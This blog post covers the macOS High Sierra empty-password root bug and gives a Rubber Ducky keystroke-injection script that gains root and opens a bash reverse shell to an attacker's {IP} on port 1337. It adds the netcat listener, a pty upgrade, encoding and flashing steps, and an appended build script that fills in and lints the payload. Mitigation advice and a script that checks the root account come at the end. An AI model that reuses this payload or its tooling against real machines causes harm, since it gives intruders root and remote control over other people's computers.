So You Want To Play With Ducks?


Blog Post by Aladdin Mubaied

Today the news broke of a serious authentication bug in macOS: any machine running the current release, macOS High Sierra 10.13.1, is vulnerable.

What is the bug?

Type “root” as the username in an authentication prompt (the lock in System Preferences is the one the original report used, but the login window works too), leave the password field blank and click the button twice. The first attempt silently enables the disabled root account with the empty password you supplied; the second attempt authenticates against it, and you have full root access on the machine.

Rubber Ducky

I thought it would be interesting to write a Rubber Ducky script for red teamers to backdoor laptops with root access :)

First, you need to get a rubber ducky.

The next step is to load the script on your Rubber Ducky. Create a file called payload.txt:

$ touch payload.txt

and put the following Ducky Script in it:

REM Script for creating a root backdoor on macOS based on the High Sierra bug (https://twitter.com/lemiorhan/status/935578694541770752).
REM Catch the shell with 'nc -l -p 1337' and change {IP} to your server's IP address or hostname.
REM osascript based on https://twitter.com/duo_labs/status/935607023026229249
REM Open Terminal through Spotlight (GUI is the Command key on a Mac).
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 500
REM 'with administrator privileges' goes through the same authorization path as the Unlock dialog, so root with an empty password is accepted.
REM The reverse shell is detached with nohup and its output redirected so that 'do shell script' returns and quitting Terminal does not hang up the shell.
STRING osascript -e 'do shell script "nohup bash -c \"bash -i >& /dev/tcp/{IP}/1337 0>&1\" >/dev/null 2>&1 &" with administrator privileges user name "root" password ""'
ENTER
REM Give the authorization and the shell a moment before quitting Terminal.
DELAY 2000
GUI q

On your server run the following command to catch the shell (GNU netcat syntax; BSD-derived netcat builds, including the one on macOS, take the port without -p, as in nc -l 1337):

$ nc -l -p 1337

Make sure you replace {IP} in the script above with your server's IP address or hostname before encoding it; nothing substitutes it for you.

The Rubber Ducky enumerates as a USB keyboard and types the script as keystrokes. osascript runs the AppleScript; do shell script ... with administrator privileges asks the same authorization service that the System Preferences lock uses, so root with an empty password is accepted and the shell it spawns runs as root. Because do shell script waits for the command it runs to finish, the reverse shell has to be detached (backgrounded with its output redirected) before Terminal is quit; otherwise the GUI q keystroke either leaves Terminal's "terminate running processes?" prompt on screen or hangs up the shell.

Flash your Ducky

To run the script above you need to compile payload.txt into the binary the Ducky firmware executes and copy it to the card. First download the Duck Encoder (duckencode.jar) and run it. The -l flag selects the keyboard layout of the target machine (fr below is French; use us for a US keyboard): with the wrong layout the quotes, slashes and braces in the STRING line are typed as different characters and the command never runs.

$ java -jar duckencode.jar -i payload.txt -o inject.bin -l fr

The firmware looks for a file named inject.bin in the root of the SD card, so keep that name. Copy inject.bin to your Rubber Ducky's SD card and enjoy your root shell! wooooot!

To get a proper pseudo-terminal after catching the shell (needed for anything that wants a tty, such as password prompts or editors), run the following inside it; High Sierra ships Python 2.7 at /usr/bin/python:

python -c 'import pty; pty.spawn("/bin/bash")'
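The three attacker-side steps above (fill in {IP}, make sure the text encodes cleanly for the target's layout, run the encoder) are easy to get wrong by hand, so here is a small build script for them. This is an added example, not part of the original post or of the Ducky tooling: it assumes the {IP} placeholder from the page plus an optional {PORT} placeholder of my own, that duckencode.jar sits in the working directory, and it uses the documentation address 192.0.2.10 as a stand-in for the listener.

```shell
#!/bin/sh
# Added example (not from the original post): renders the page's payload.txt for a
# given listener, lints the result, and wraps the encoder call.
# Assumptions: the template uses the {IP} placeholder from the page and, optionally,
# a {PORT} one (my addition); duckencode.jar sits in the working directory.

# Ducky Script commands the page uses plus a few common ones; anything else is a typo.
KNOWN_CMDS="REM DELAY STRING ENTER GUI DEFAULT_DELAY DEFAULTDELAY REPEAT ALT CTRL SHIFT"

# render_payload TEMPLATE OUT IP [PORT]
# Substitutes {IP} and {PORT}; fails if any {NAME} placeholder is left over.
render_payload() {
    tmpl=$1; out=$2; ip=$3; port=${4:-1337}
    sed -e "s/{IP}/$ip/g" -e "s/{PORT}/$port/g" "$tmpl" > "$out" || return 1
    if grep -q '{[A-Z_][A-Z_]*}' "$out"; then
        echo "render_payload: unreplaced placeholder in $out" >&2
        return 1
    fi
    return 0
}

# lint_payload FILE
# Fails on unknown commands and on non-ASCII bytes: the encoder maps each
# character to a keycode for the layout given with -l, so anything outside
# printable ASCII is the first thing to be typed wrong on the target.
lint_payload() {
    f=$1; rc=0; n=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        [ -z "$line" ] && continue
        cmd=${line%% *}
        case " $KNOWN_CMDS " in
            *" $cmd "*) ;;
            *) echo "$f:$n: unknown command '$cmd'" >&2; rc=1 ;;
        esac
        if printf '%s\n' "$line" | LC_ALL=C grep -q '[^ -~]'; then
            echo "$f:$n: non-ASCII character" >&2; rc=1
        fi
    done < "$f"
    return $rc
}

# encode_payload FILE OUT LAYOUT
# The layout must be the target's keyboard layout (us, fr, ...), not the attacker's.
encode_payload() {
    java -jar duckencode.jar -i "$1" -o "$2" -l "$3"
}

# Usage: sh build_payload.sh payload.txt 192.0.2.10 1337 us
# (192.0.2.10 is a documentation address standing in for the listener.)
if [ "$#" -eq 4 ]; then
    render_payload "$1" rendered.txt "$2" "$3" &&
    lint_payload rendered.txt &&
    encode_payload rendered.txt inject.bin "$4"
fi
```

The lint deliberately stays at the character level: the encoder will happily emit keycodes for a stray accented character or a misspelt command, and the failure only shows up on the target as garbage typed into Terminal, so this is the place to catch it. Hostnames containing a slash would break the sed substitution; pass an address or a plain hostname.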

What to do to protect myself?

The real fix is Apple's Security Update 2017-001, which closes the bug. Until it is installed there are a couple of things you can do:

1) Set a strong password for the “root” account. Setting one also enables the account, and an enabled root account with a real password is what stops the empty-password login. Run:

$ sudo passwd -u root 

2) Make sure the authentication prompt is not reachable over the network. Remote Login (SSH) and Screen Sharing authenticate against the same local accounts, so check that:

 System Preferences->Sharing->Remote Login is disabled/unchecked 

3) Disabling the root user is not a mitigation for this bug. A disabled root account is exactly the state the bug abuses, so disabling it again on an unpatched machine reopens the hole. Only disable root once the update is installed; the command is:

$ dsenableroot -d -u adminaccount -p adminaccountpassword
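A quick way to tell which of the three states the root account is in is to read its AuthenticationAuthority attribute from Open Directory. The check below is an added example, not part of the original post, and it rests on assumptions about dsenableroot's bookkeeping rather than on anything the page states: a root account that has never been enabled has no AuthenticationAuthority attribute (dscl reports "No such key"), one disabled with dsenableroot -d carries the ;DisabledUser; tag, and an enabled one carries ;ShadowHash; without it. The classification is split out of the dscl call so it can be exercised on sample strings anywhere.

```shell
#!/bin/sh
# Added example (not from the original post). Classifies the root account from
# the text that `dscl . -read /Users/root AuthenticationAuthority` prints.
# Assumptions (from how dsenableroot behaves, not from the page): never-enabled
# root has no such attribute, root disabled with `dsenableroot -d` carries the
# ;DisabledUser; tag, and enabled root carries ;ShadowHash; without that tag.

# classify_root_authority AUTHORITY_TEXT
# Prints one of: never-enabled, disabled, enabled, unknown
classify_root_authority() {
    case "$1" in
        ""|*"No such key"*)  echo never-enabled ;;
        *";DisabledUser;"*)  echo disabled ;;
        *";ShadowHash;"*)    echo enabled ;;
        *)                   echo unknown ;;
    esac
}

# root_exposed AUTHORITY_TEXT
# Returns 0 when the account is in a state the empty-password bug abuses on an
# unpatched 10.13.1 (never enabled, or disabled again after a password was set).
root_exposed() {
    case "$(classify_root_authority "$1")" in
        never-enabled|disabled) return 0 ;;
        *)                      return 1 ;;
    esac
}

# check_local_root
# Live check on the Mac itself; on any other system dscl is absent and it bails out.
check_local_root() {
    command -v dscl >/dev/null 2>&1 || { echo "dscl not found; not a Mac" >&2; return 2; }
    auth=$(dscl . -read /Users/root AuthenticationAuthority 2>&1)
    echo "root account: $(classify_root_authority "$auth")"
    if root_exposed "$auth"; then
        echo "exposed: set a root password (sudo passwd -u root) and install Security Update 2017-001" >&2
        return 1
    fi
    return 0
}
```

Run check_local_root on the machine you want to assess; a non-zero exit means root is in one of the two states the bug needs. The classification treats an unrecognised attribute as unknown rather than safe, which is the right default for a check that decides whether to raise an alarm.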